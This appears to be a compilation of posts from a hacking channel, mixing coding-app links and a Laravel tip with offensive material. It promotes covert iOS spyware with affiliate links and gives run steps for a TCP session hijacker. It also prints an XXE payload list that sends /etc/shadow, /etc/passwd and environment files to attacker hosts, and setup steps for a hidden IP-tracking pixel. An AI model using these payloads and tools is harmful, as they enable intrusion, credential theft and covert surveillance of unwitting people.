▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑LEARN PROGRAMMING VIA IOS/ANDROID APPLICATIONS :

https://play.google.com/store/apps/details?id=com.zenva.codemurai&hl=en_US

https://play.google.com/store/apps/details?id=com.zenva.codemurai&hl=en_US

https://apps.apple.com/us/app/codehub-github-for-ios/id707173885?ls=1

https://apps.apple.com/in/app/programming-hub-learn-to-code/id1049691226

https://play.google.com/store/apps/details?id=com.freeit.java&hl=en_IN

https://itunes.apple.com/app/apple-store/id469863705?pt=698519&ct=website%20footer&mt=8

https://play.google.com/store/apps/details?id=org.khanacademy.android&referrer=utm_source%3Dwebsite%2520footer%26utm_medium%3Dwebsite%2520footer%26utm_campaign%3Dwebsite%2520footer

@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑SOME NEW KEYLOGGERS IOS SPECIALIST:

• Keylogging;
• Monitor calls — both call logs and recordings;
• Monitor texts, emails, browsing history;
• Monitor instant messaging and social media apps — Facebook, WhatsApp, Viber, Yahoo;
• View contacts, media files, app usage;
• Track GPS location.

http://mspy.go2cloud.org/aff_c?offer_id=2&aff_id=4774&url_id=99

http://www.mobile-spy.com/iphone.html

http://maxxspy.com/

https://highstermobile.com/

https://www.flexispy.com/

https://xnspy.com/

https://spyera.com/#nvlv

https://www.spyzie.com/

https://pumpic.com/keylogger-for-iphone.html

https://store.payproglobal.com/r?u=https://ikeymonitor.com/&a=2378

ENJOY❤️👍🏻
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑HEX EDITORS FOR TERMUX :

hexcurse
Use pkg install hexcurse to install a console hex editor.

Homepage: https://github.com/LonnyGomes/hexcurse

ired
Use pkg install ired to install a minimalist hexadecimal editor.

Homepage: https://github.com/radare/ired

radare2
Use pkg install radare2 to install an advanced hexadecimal editor.

Homepage: https://rada.re

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑This plugin for Termux provides

1) beautiful color schemes

2) powerline-ready fonts to customize the appearance of the terminal.

> Long-press anywhere on the Termux terminal and use the "Style" menu entry to use after installation

🦑DOWNLOAD:

https://f-droid.org/packages/com.termux.styling/

https://f-droid.org/repo/com.termux.styling_28.apk
Download : https://f-droid.org/packages/com.termux.styling/

That's it🤠
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑tcp connection hijacker, rust rewrite of shijack :

This was written for TAMUctf 2018, brick house 100. The target was a telnet server that was protected by 2FA. Since the challenge wasn't authenticated, there have been multiple solutions for this. Our solution (cyclopropenylidene) was waiting until the authentication was done, then inject a tcp packet into the telnet connection:

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) git clone https://github.com/kpcyrd/rshijack.git

2) cd rshijack

3) Docker
If needed, rshijack can be pulled as a docker image. The image is currently about 10.2MB.

docker run -it --init --rm --net=host kpcyrd/rshijack eth0 172.16.13.20:37386 172.16.13.19:23

4) The way this works is by sniffing for a packet of a specific connection, then read the SEQ and ACK fields. Using that information, it's possible to send a packet on a raw socket that is accepted by the remote server as valid.

✅git 2020
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑WANT TO KNOW WHO IS ON YOUR WIFI ?

BEST APPS:

https://play.google.com/store/apps/details?id=com.etwok.netspotapp

https://play.google.com/store/apps/details?id=com.farproc.wifi.analyzer&hl=en

https://play.google.com/store/apps/details?id=org.speedspot.wififinder&hl=en

https://play.google.com/store/apps/details?id=com.overlook.android.fing&hl=en

https://play.google.com/store/apps/details?id=com.northbridge.wifisignalstrength

https://play.google.com/store/apps/details?id=lksystems.wifiintruder&hl=en

https://play.google.com/store/apps/details?id=de.android.telnet

https://play.google.com/store/apps/details?id=com.staircase3.opensignal&hl=en

https://play.google.com/store/apps/details?id=com.etwok.netspotapp

ENJOY ❤️👍🏻
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Determining if the Current User is Authenticated :
#ProTips

1) Use Auth::check().

The Auth::check() method returns true or false.

if (Auth::check())
{
echo "Yay! You're logged in.";
}

2) Several things happen behind the scenes when you do this.

> First Laravel checks if the current session has the id of a user. If so, then an attempt is made to retrieve the user from the database.

3) If that fails, then Laravel checks for the “remember me” cookie. If that’s present then once again an attempt is made to retrieve the user from the database.

4) Only if a valid user is retrieved from the database is true returned.

5) The ‘guest’ filter uses this method
Laravel provides a default implementation of the guest filter in app/filters.php.

Route::filter('guest', function()
{
if (Auth::check()) return Redirect::to('/');
});

6) This default implementation is used when you want to add a filter to a route that is only accessible by guests (aka users who are not logged in). If a user is logged in then they are redirected to the home page.

Unixforu
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑XXE PAYLOADS LIST :


--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>

---------------------------------------------------------------
OoB extraction
---------------------------------------------------------------

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://x.x.x.x:443/ev.xml">
%sp;
%param1;
]>
<r>&exfil;</r>

## External dtd: ##

<!ENTITY % data SYSTEM "file:///c:/windows/win.ini">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://x.x.x.x:443/?%data;'>">

----------------------------------------------------------------
OoB variation of above (seems to work better against .NET)
----------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://x.x.x.x:443/ev.xml">
%sp;
%param1;
%exfil;
]>

## External dtd: ##

<!ENTITY % data SYSTEM "file:///c:/windows/win.ini">
<!ENTITY % param1 "<!ENTITY &#x25; exfil SYSTEM 'http://x.x.x.x:443/?%data;'>">

---------------------------------------------------------------
OoB extraction
---------------------------------------------------------------

<?xml version="1.0"?>
<!DOCTYPE r [
<!ENTITY % data3 SYSTEM "file:///etc/shadow">
<!ENTITY % sp SYSTEM "http://EvilHost:port/sp.dtd">
%sp;
%param3;
%exfil;
]>

## External dtd: ##
<!ENTITY % param3 "<!ENTITY &#x25; exfil SYSTEM 'ftp://Evilhost:port/%data3;'>">

-----------------------------------------------------------------------
OoB extra ERROR -- Java
-----------------------------------------------------------------------
<?xml version="1.0"?>
<!DOCTYPE r [
<!ENTITY % data3 SYSTEM "file:///etc/passwd">
<!ENTITY % sp SYSTEM "http://x.x.x.x:8080/ss5.dtd">
%sp;
%param3;
%exfil;
]>
<r></r>
## External dtd: ##

<!ENTITY % param1 '<!ENTITY &#x25; external SYSTEM "file:///nothere/%payload;">'> %param1; %external;


-----------------------------------------------------------------------
OoB extra nice
-----------------------------------------------------------------------

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY % start "<![CDATA[">
<!ENTITY % stuff SYSTEM "file:///usr/local/tomcat/webapps/customapp/WEB-INF/applicationContext.xml ">
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "http://evil/evil.xml">
%dtd;
]>
<root>&all;</root>

## External dtd: ##

<!ENTITY all "%start;%stuff;%end;">

------------------------------------------------------------------
File-not-found exception based extraction
------------------------------------------------------------------

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY % one SYSTEM "http://attacker.tld/dtd-part" >
%one;
%two;
%four;
]>

## External dtd: ##

<!ENTITY % three SYSTEM "file:///etc/passwd">
<!ENTITY % two "<!ENTITY % four SYSTEM 'file:///%three;'>">

-------------------------^ you might need to encode this % (depends on your target) as: &#x25;

--------------
FTP
--------------
<?xml version="1.0" ?>
<!DOCTYPE a [
<!ENTITY % asd SYSTEM "http://x.x.x.x:4444/ext.dtd">
%asd;
%c;
]>
<a>&rrr;</a>


## External dtd ##
<!ENTITY % d SYSTEM "file:///proc/self/environ">
<!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://x.x.x.x:2121/%d;'>">

---------------------------
Inside SOAP body
---------------------------
<soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]></foo></soap:Body>


---------------------------
Untested - WAF Bypass
---------------------------
<!DOCTYPE :. SYTEM "http://"
<!DOCTYPE :_-_: SYTEM "http://"
<!DOCTYPE {0xdfbf} SYSTEM "http://"

source https://gist.github.com/staaldraad/01415b990939494879b4
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑SOME IP HACKING-TRACKING :

F E A T U R E S :

Very high configurable tracking image generation
Tracking links generation
Tracking hided and not recognizable from the target point of view
Integrated Dashboard
Self-tracking prevention
Possibility to stop and start the tracking at any time
Possibility to hide the Dashboard and protect its access with a password
Live tracking reports from the Dashboard
Tracking reports live delivered to a configurable mail address
Different IP analysis services
User-Agent analysis service
Integrate URL shortening service
AllInOne PHP file
No need for a Database
Open Source

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) clone https://github.com/damianofalcioni/IP-Biter

Deploy IP-Biter

2) Copy ipb.php in your PHP server and optionally create a .htaccess file as described in the next security notes

3) Some configurable parameters are available in the firsts uncommented PHP lines of the ipb.php file, identified by the comment "START CONFIGURATION SECTION"

4) Access the Dashboard

5) Access the dashboard through ipb.php?op=$dashboardPage (or through ipb.php if $dashboardPage=='')
If $dashboardPageSecret!='' then a login page will appear asking for the $dashboardPageSecret value

6) Create a new configuration

7) When the dashboard is opened without parameters, a new configuration is created

8) Another empty new configuration can be generate clicking the "New" button

9) Configure the tracking image and the advanced setting if needed

10) It is possible to left the original image url empty. In this case an empty image will be used.

12) Add tracking links if needed

13) It is possible to left the original link empty. In this case the link will generate a 404 page.

14) Save the configuration

15) Distribute the generated image or the links to start the tracking

16) You can click the copy button and paste in a html rich email editor like gmail

NOTE: If you try to open the generated image or links but have in the same browser the dashboard page opened and loaded, your request will not be tracked (self-tracking prevention feature)

17) Load an existing configuration

18) When the dashboard is opened with the parameter "uuid", the associated configuration is loaded

19) Another configuration can be loaded pasting the "Track UUID" in the dashboard relative field and clicking the "Load" button

20) The reports will be automatically visualized in the "Tracking Reports" section of the dashboard

@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Detailed fresh Proxies List

https://pastebin.com/9hy2B7Px